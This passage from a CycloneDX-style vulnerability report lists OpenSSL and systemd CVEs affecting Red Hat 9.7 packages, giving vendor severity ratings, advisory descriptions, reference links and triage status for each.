"ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 476 ], "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyTransportRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyTransportRecipientInfo with\nRSA-OAEP encryption is processed, the optional parameters field of\nRSA-OAEP SourceFunc algorithm identifier is examined without checking\nfor its presence. This results in a NULL pointer dereference if the field\nis missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-28390" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-28390" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html" }, { "url": "https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc" }, { "url": "https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6" }, { "url": "https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4" }, { "url": "https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788" }, { "url": "https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28390" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://ubuntu.com/security/notices/USN-8155-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-28390" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11" } ], "published": "2026-04-07T22:16:21+00:00", "updated": "2026-05-12T13:17:33+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-29111", "ratings": [ { "source": { "name": "alma" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "oracle-oval" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 269 ], "description": "systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On version v249 and older the effect is not an assert, but stack overwriting, with the attacker controlled content. From version v250 and newer this is not possible as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available.", "recommendation": "Upgrade systemd to version 252-55.el9_7.9; Upgrade systemd-libs to version 252-55.el9_7.9; Upgrade systemd-pam to version 252-55.el9_7.9; Upgrade systemd-rpm-macros to version 252-55.el9_7.9", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-29111" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13677" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-29111" }, { "url": "https://bugzilla.redhat.com/2450505" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-13677.html" }, { "url": "https://github.com/systemd/systemd/commit/1d22f706bd04f45f8422e17fbde3f56ece17758a" }, { "url": "https://github.com/systemd/systemd/commit/20021e7686426052e3a7505425d7e12085feb2a6" }, { "url": "https://github.com/systemd/systemd/commit/21167006574d6b83813c7596759b474f56562412" }, { "url": "https://github.com/systemd/systemd/commit/3cee294fe8cf4fa0eff933ab21416d099942cabd" }, { "url": "https://github.com/systemd/systemd/commit/42aee39107fbdd7db1ccd402a2151822b2805e9f" }, { "url": "https://github.com/systemd/systemd/commit/54588d2dedff54bfb6036670820650e4ea74628f" }, { "url": "https://github.com/systemd/systemd/commit/7ac3220213690e8a8d6d2a6e81e43bd1dce01d69" }, { "url": "https://github.com/systemd/systemd/commit/80acea4ef80a4bb78560ed970c34952299b890d6" }, { "url": "https://github.com/systemd/systemd/commit/b5fd14693057e5f2c9b4a49603be64ec3608ff6c" }, { "url": "https://github.com/systemd/systemd/commit/efa6ba2ab625aaa160ac435a09e6482fc63bdbe8" }, { "url": "https://github.com/systemd/systemd/security/advisories/GHSA-gx6q-6f99-m764" }, { "url": "https://linux.oracle.com/cve/CVE-2026-29111.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-13677.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29111" }, { "url": "https://ubuntu.com/security/notices/USN-8119-1" }, { "url": "https://ubuntu.com/security/notices/USN-8119-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-29111" } ], "published": "2026-03-23T22:16:26+00:00", "updated": "2026-04-15T16:44:38+00:00", "affects": [ { "ref": "pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-31789", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 9.8, "severity": "critical", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.8, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 787 ], "description": "Issue summary: Converting an excessively large OCTET STRING value to\na hexadecimal string leads to a heap buffer overflow on 32 bit platforms.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nan attacker controlled code execution or other undefined behavior.\n\nIf an attacker can supply a crafted X.509 certificate with an excessively\nlarge OCTET STRING value in extensions such as the Subject Key Identifier\n(SKID) or Authority Key Identifier (AKID) which are being converted to hex,\nthe size of the buffer needed for the result is calculated as multiplication\nof the input length by 3. On 32 bit platforms, this multiplication may overflow\nresulting in the allocation of a smaller buffer and a heap buffer overflow.\n\nApplications and services that print or log contents of untrusted X.509\ncertificates are vulnerable to this issue. As the certificates would have\nto have sizes of over 1 Gigabyte, printing or logging such certificates\nis a fairly unlikely operation and only 32 bit platforms are affected,\nthis issue was assigned Low severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-31789" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-31789" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://github.com/advisories/GHSA-j79m-9jxq-788r" }, { "url": "https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde" }, { "url": "https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf" }, { "url": "https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49" }, { "url": "https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9" }, { "url": "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31789" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-31789" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11" } ], "published": "2026-04-07T22:16:21+00:00", "updated": "2026-05-12T13:17:34+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-31790", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 754 ], "description": "Issue summary: Applications using RSASVE key encapsulation to establish\na secret encryption key can send contents of an uninitialized memory buffer to\na malicious peer.\n\nImpact summary: The uninitialized buffer might contain sensitive data from the\nprevious execution of the application process which leads to sensitive data\nleakage to an attacker.\n\nRSA_public_encrypt() returns the number of bytes written on success and -1\non error. The affected code tests only whether the return value is non-zero.\nAs a result, if RSA encryption fails, encapsulation can still return success to\nthe caller, set the output lengths, and leave the caller to use the contents of\nthe ciphertext buffer as if a valid KEM ciphertext had been produced.\n\nIf applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an\nattacker-supplied invalid RSA public key without first validating that key,\nthen this may cause stale or uninitialized contents of the caller-provided\nciphertext buffer to be disclosed to the attacker in place of the KEM\nciphertext.\n\nAs a workaround calling EVP_PKEY_public_check() or\nEVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate\nthe issue.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-31790" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-31790" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://github.com/advisories/GHSA-vgxx-5xj5-q97x" }, { "url": "https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac" }, { "url": "https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482" }, { "url": "https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406" }, { "url": "https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790" }, { "url": "https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31790" }, { "url": "https://openssl-library.org/news/secadv/20260407.txt" }, { "url": "https://ubuntu.com/security/notices/USN-8155-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-31790" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11" } ], "published": "2026-04-07T22:16:21+00:00", "updated": "2026-05-12T13:17:34+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.0.7-8.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.0.7-8.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": 